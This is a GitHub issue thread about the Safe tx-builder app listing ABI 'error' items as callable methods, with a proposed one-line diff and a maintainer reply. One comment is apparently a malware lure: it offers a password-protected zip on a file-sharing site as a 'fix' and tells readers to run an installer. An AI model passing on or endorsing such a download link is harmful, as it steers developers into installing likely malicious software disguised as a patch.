### ISSUE TITLE
tx-builder: ABI items of `error` type should not be considered as methods.

### ISSUE THREAD

**Issue by lmy375** [safe-global/safe-react-apps#815]
## Description

The UI does not filter ABI items correctly. 

In more detail, items whose type is `error`, which is a new kind of ABI item and can not be invoked as a method,  are also shown in the method selection box.  

Here's a sample of contract which uses such kind ABI type. https://etherscan.io/address/0xC96dE26018A54D51c097160568752c4E3BD6C364

A simple fix could be like:
```diff
-        if (e?.type?.toLowerCase() === 'event') {
+        if (e?.type?.toLowerCase() === 'event' || e?.type?.toLowerCase() === 'error' ) {
```
https://github.com/safe-global/safe-react-apps/blob/4236a28d7cc6ed5581f445ea76cc73a0d60cbec5/apps/tx-builder/src/lib/interfaceRepository.ts#L53

## Environment
 - Browser:Chrome
 - Wallet: MetaMask
 - Safe: all
 - Environment: all

## Expected result

Items like `AddressEmptyCode` should not be included in the method option box.

## Obtained result

See the screenshot below. 

## Screenshots

![img](https://github.com/user-attachments/assets/a6d5a4ac-4b9d-4c4e-8720-8d58ef76db95)

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by katspaugh** [comment]
Thank you! We're currently busy with other priorities so pull requests are welcome.
